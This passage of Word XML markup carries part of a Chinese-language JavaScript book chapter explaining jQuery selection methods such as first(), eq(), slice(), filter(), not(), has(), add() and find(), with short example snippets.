        <w:t>div class="note"</w:t>
      </w:r>
      <w:r>
        <w:t>＞的＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法允许在简单选择器的某些过滤器中使用圆括号，但并不允许使用圆括号来进行更常见的分组。例</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如，不能把选择器组或组合选择器放在圆括号中并且当成简单选择器：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(h1,h2,h3)+p//</w:t>
      </w:r>
      <w:r>
        <w:t>非法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>h1+p,h2+p,h3+p//</w:t>
      </w:r>
      <w:r>
        <w:t>正确的写法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="19_8_2_Xuan_Qu_Fang_Fa_"/>
      <w:r>
        <w:t>19.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　选取方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>函数支持的选择器语法，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一些选取方法。本章中我们已看到过的大部分</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法都是在选中元素上执行某种操作。选取</w:t>
      </w:r>
      <w:r>
        <w:t>方法不一样：它们会修改选中元素集，对其进行提取、扩充或仅作为新选取操作的起点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节描述这些选取方法。你会注意到这些选取方法中的多数提供的功能与选择器语法的功能是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提取选中元素最简单的方式是按位置提取。</w:t>
      </w:r>
      <w:r>
        <w:t>first()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象仅包含选中元素中的第一个，</w:t>
      </w:r>
      <w:r>
        <w:t>last()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象则只包含最后一个元素。更通用的是，</w:t>
      </w:r>
      <w:r>
        <w:t>eq()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象只包含指定序号的单个选中元素。（在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>中，负序号也是允许的，会从选区的末尾开始计数。）注意这些方法返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象只</w:t>
      </w:r>
      <w:r>
        <w:t>含有一个元素。这与常见的数组序号是不一样的，数组序号返回的单一元素没有经过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>包装：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var paras=$("p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paras.first()//</w:t>
      </w:r>
      <w:r>
        <w:t>仅选取第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paras.last()//</w:t>
      </w:r>
      <w:r>
        <w:t>仅选取最后一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paras.eq(1)//</w:t>
      </w:r>
      <w:r>
        <w:t>选取第二个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paras.eq(-2)//</w:t>
      </w:r>
      <w:r>
        <w:t>选取倒数第二个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paras[1]//</w:t>
      </w:r>
      <w:r>
        <w:t>第二个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素自身</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过位置提取选区更通用的方法是</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法与</w:t>
      </w:r>
      <w:r>
        <w:t>Array.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似：前者接受开始和结束序号（负序号会从结尾处计算），返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象包含从开始到结束序号（但不包含结束序号）处的元素集。如果省略结束序号，返回的对象会包含从开始序号起的所有元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p").slice(2,5)//</w:t>
      </w:r>
      <w:r>
        <w:t>选取第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个、第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个和第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").slice(-3)//</w:t>
      </w:r>
      <w:r>
        <w:t>选取最后</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>是通用的选区过滤方法，有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>种调用方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>传递选择器字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，仅包含也匹配该选择器的选中元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>传递另一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象给</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象包含这两个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的交集。也可以传递元素数组甚至单一文档元素给</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>传递判断函数给</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>，会为每一个匹配元素调用该函数，</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>则返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，仅包含判断函数为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>（或任意真值）的元素。在调用判断函数时，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值为当前元素，参数是元素序号。（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中的</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>Query.grep()</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").filter(".note")//</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>$("div.note")</w:t>
      </w:r>
      <w:r>
        <w:t>一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").filter($(".note"))//</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>$("div.note")</w:t>
      </w:r>
      <w:r>
        <w:t>一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").filter(function(idx){return idx%2==0})//</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>$("div:even")</w:t>
      </w:r>
      <w:r>
        <w:t>一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>方法与</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，除了含义与</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>相反。如果传递选择器字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象只包含不匹配该选择器的元素</w:t>
      </w:r>
      <w:r>
        <w:t>。如果传递</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象、元素数组或单一元素给</w:t>
      </w:r>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会返回除了显式排除的元素之外的所有选中元素。如果传递判断函数给</w:t>
      </w:r>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>，该判断函数的调用就与在</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>中一样，只是返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象仅包含那些使得判断函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或其他假值的元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").not("#header,#footer");//</w:t>
      </w:r>
      <w:r>
        <w:t>除了两个特殊元素之外的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>中，提取选区的另一种方式是</w:t>
      </w:r>
      <w:r>
        <w:t>has()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如果传入选择器，</w:t>
      </w:r>
      <w:r>
        <w:t>has()</w:t>
      </w:r>
      <w:r>
        <w:t>会返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，仅包含有子孙</w:t>
      </w:r>
      <w:r>
        <w:t>元素匹配该选择器的选中元素。如果传入文档元素给</w:t>
      </w:r>
      <w:r>
        <w:t>has()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会将选中元素集调整为那些是指定元素祖先节点的选中元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p").has("a[href]")//</w:t>
      </w:r>
      <w:r>
        <w:t>包含链接的段落</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会扩充选区，而不是对其进行过滤或提取。可以将传给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的任何参数（除了函数）照样传给</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会返回原来的选中元素，加上传给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的那些参数所选中（或创建）的那些元素。</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>会移除重复元素，并对该组合选区进行排序，以便里面的元素按照文档中的顺序排列：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>选取所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞和所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的等价方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div,p")//</w:t>
      </w:r>
      <w:r>
        <w:t>使用选择器组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").add(p)//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>传入选择器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").add($("p"))//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var paras=document.getElementsByTagName("p");//</w:t>
      </w:r>
      <w:r>
        <w:t>类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").add(paras);//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>传入元素数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>将选中元素集用做上下文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上面描述的</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>、和</w:t>
      </w:r>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会在各自的选中元素集上执行交集、并集和差集运算。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还定义一些其他选取方法可将当前选中元素集作为上下文来使用。对选中的每一个元素，这些方法会使用该选中元素作为上下文或起始点来得到新的选中元素集，然后返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，包含所有新的选中元素的并集。与</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似，会移除重复元素并进行排序，以便元素会按照在文档中出现的顺序排列好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该类别选取方法中最通用的是</w:t>
      </w:r>
      <w:r>
        <w:t>find()</w:t>
      </w:r>
      <w:r>
        <w:t>。它会在每一个当前选中元素的子孙元素中寻找与指定选择器字符串匹配</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，然后它返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象来代表所匹配的子孙元素集。注意这些新选中的元素不会并入已存在的选中元素集中。同时注意</w:t>
      </w:r>
      <w:r>
        <w:t>find()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>不会选中新元素，只是简单地将当前选中的元素集进行缩减：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").find("p")//</w:t>
      </w:r>
      <w:r>
        <w:t>在＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞中查找＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，与</w:t>
      </w:r>
      <w:r>
        <w:t>$("div p")</w:t>
      </w:r>
      <w:r>
        <w:t>相同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该类别中的其他方法返回新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，代表当前选中元素集中每一个元素的子元素、兄弟元素或父元素。大部分都接受可选的选择器字符串作为参数。不传入选择器时，它们会返回所有子元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素、兄弟元素或父元素。传入选择器时，它们会过滤元素集，仅返回匹配的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>children()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回每一个选中元素的直接子元素，可以用可选的选择器参数进行过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>寻找</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"header"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"footer"</w:t>
